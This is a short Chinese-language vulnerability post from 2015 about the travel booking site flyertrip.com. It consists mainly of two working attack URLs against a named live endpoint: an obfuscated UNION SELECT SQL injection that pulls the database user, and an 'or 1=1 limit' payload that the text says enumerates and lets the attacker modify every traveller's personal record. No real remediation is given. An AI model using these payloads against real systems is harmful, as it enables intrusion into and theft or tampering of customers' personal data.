飞客旅行网主站参数过滤不严,可导致注入,遍历,越权修改等高危漏洞

技术文章 作者:MCbang 2015-12-26 04:57:53 阅读:124

今年过节不收礼,收礼只收脑白金

首先还是要注册个账号!

1.注入

http://www.flyertrip.com/hotels/personalCenter/editTravel.php?flag=update&id=-254%23%0aUNION%23%0aSELECT%23%0a1,2,3,4,5,6,7,user(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -


2.旅客信息遍历越权修改

http://www.flyertrip.com/hotels/personalCenter/editTravel.php?flag=update&id=1%23%0aor%23%0a1=1 limit%23%0a100,1-- s
修改100即可遍历所有旅客信息,也可进行修改

解决方案:

你们更专业.


来源:红黑联盟

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

关注数据与安全,洞悉企业级服务市场:http://www.ijiandao.com/
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

图库
关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接